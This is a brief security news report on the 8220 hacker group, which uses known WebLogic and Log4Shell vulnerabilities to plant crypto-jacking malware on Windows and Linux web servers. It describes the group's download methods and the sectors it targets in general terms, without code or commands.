8220 Hacker Group exploiting WebLogic and Log4J issues to attack Web servers

The 8220 hacker group, identified in 2017 by Cisco Talos, targets Windows and Linux web servers using crypto-jacking malware, exploiting vulnerabilities like Oracle WebLogic's CVE-2017-3506 and Log4Shell's CVE-2021-44228. Crypto-jacking malware is a type of malicious software that secretly uses a victim's computing resources to mine cryptocurrency.

The hacker group has a history of exploiting a range of vulnerabilities in systems such as Confluence, Log4j, Drupal, Hadoop YARN, and Apache Struts2, using evolving tactics, techniques, and procedures.

In their recent activities, the 8220 gang has exploited vulnerabilities such as Oracle WebLogic (CVE-2017-3506) and Log4Shell (CVE-2021-44228), using methods that are simple yet effective. They have also utilized the CVE-2020-14883 vulnerability in Oracle WebLogic Server, often combined with CVE-2020-14882, an authentication bypass issue. These vulnerabilities are well-known and their exploitation tactics are publicly documented, allowing the group to easily adapt these for malware distribution.

The 8220 gang employs different methods based on the target's operating system. For Linux, they use various download techniques including cURL, wget, and Python urllib, all encoded in base64. For Windows, they execute downloaded PowerShell scripts using simple PowerShell WebClient commands. Additionally, they use a method to execute Java code directly, bypassing the need for an externally hosted XML file.

The 8220 gang tends to reuse the same IPs, web servers, payloads, and attack tools, making their activities relatively easy to trace. Their recent activity spans across various sectors, including healthcare, telecommunications, and financial services in multiple countries, showing their opportunistic approach to target selection.